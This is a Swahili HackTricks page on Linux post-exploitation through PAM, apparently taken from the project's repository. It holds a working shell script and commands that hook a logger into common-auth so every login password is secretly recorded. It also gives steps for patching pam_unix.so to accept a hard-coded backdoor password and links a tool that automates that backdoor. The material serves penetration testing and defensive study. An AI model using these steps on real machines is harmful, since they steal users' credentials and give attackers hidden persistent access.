hacktricks/linux-hardening/linux-post-exploitation/README.md
2024-02-11 02:13:58 +00:00

77 lines
5.7 KiB
Markdown

# Uchunguzi Baada ya Kuvamia Linux
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Kudukua Nywila za Kuingia kwa Kutumia PAM
Hebu tusanidi moduli ya PAM ili kurekodi kila nywila ambayo mtumiaji anatumia kuingia. Ikiwa hujui ni nini PAM angalia:
{% content-ref url="pam-pluggable-authentication-modules.md" %}
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
{% endcontent-ref %}
**Kwa maelezo zaidi angalia [chapisho asili](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu:
**Muhtasari wa Mbinu:**
Moduli za Uthibitishaji Zinazoweza Kusanikishwa (PAM) hutoa uwezo wa kusimamia uthibitishaji kwenye mfumo wa Unix. Zinaweza kuimarisha usalama kwa kubinafsisha mchakato wa kuingia lakini pia zinaweza kuwa na hatari ikitumiwa vibaya. Muhtasari huu unaelezea mbinu ya kukamata nywila za kuingia kwa kutumia PAM, pamoja na mikakati ya kupunguza hatari.
**Kukamata Nywila:**
- Script ya bash iliyoitwa `toomanysecrets.sh` imeundwa ili kurekodi jaribio la kuingia, ikikamata tarehe, jina la mtumiaji (`$PAM_USER`), nywila (kupitia stdin), na anwani ya IP ya mwenyeji wa mbali (`$PAM_RHOST`) kwenye `/var/log/toomanysecrets.log`.
- Script hiyo inafanywa kuwa inatekelezeka na kuunganishwa kwenye usanidi wa PAM (`common-auth`) kwa kutumia moduli ya `pam_exec.so` na chaguo za kukimbia kimya kimya na kuonyesha ishara ya uthibitishaji kwa script.
- Mbinu hii inaonyesha jinsi mwenyeji wa Linux aliyeathiriwa anaweza kudukuliwa ili kurekodi nywila kwa siri.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
```
### Kuingiza Backdoor kwenye PAM
**Kwa maelezo zaidi angalia [chapisho asili](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Hii ni muhtasari tu:
Pluggable Authentication Module (PAM) ni mfumo unaotumiwa chini ya Linux kwa uthibitishaji wa mtumiaji. Inafanya kazi kwa misingi mitatu kuu: **jina la mtumiaji**, **nywila**, na **huduma**. Faili za usanidi kwa kila huduma zinapatikana katika saraka ya `/etc/pam.d/`, ambapo maktaba za pamoja hushughulikia uthibitishaji.
**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa kutumia nywila maalum, kukiuka nywila halisi ya mtumiaji. Hii inazingatia sana maktaba ya pamoja ya `pam_unix.so` inayotumiwa na faili ya `common-auth`, ambayo inajumuishwa na huduma nyingi kwa uthibitishaji wa nywila.
### Hatua za Kubadilisha `pam_unix.so`:
1. **Tafuta Mwongozo wa Uthibitishaji** katika faili ya `common-auth`:
- Mstari unaohusika na ukaguzi wa nywila ya mtumiaji unaita `pam_unix.so`.
2. **Badilisha Kanuni ya Chanzo**:
- Ongeza kauli ya masharti katika faili ya chanzo ya `pam_unix_auth.c` ambayo inaruhusu ufikiaji ikiwa nywila iliyopangwa imetumiwa, vinginevyo, inaendelea na mchakato wa kawaida wa uthibitishaji.
3. **Rekebisha na Badilisha** maktaba iliyobadilishwa ya `pam_unix.so` katika saraka sahihi.
4. **Jaribio**:
- Ufikiaji unaruhusiwa kwenye huduma mbalimbali (login, ssh, sudo, su, screensaver) kwa kutumia nywila iliyopangwa, wakati mchakato wa kawaida wa uthibitishaji unaendelea kama kawaida.
{% hint style="info" %}
Unaweza kiotomatisha mchakato huu na [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
{% endhint %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>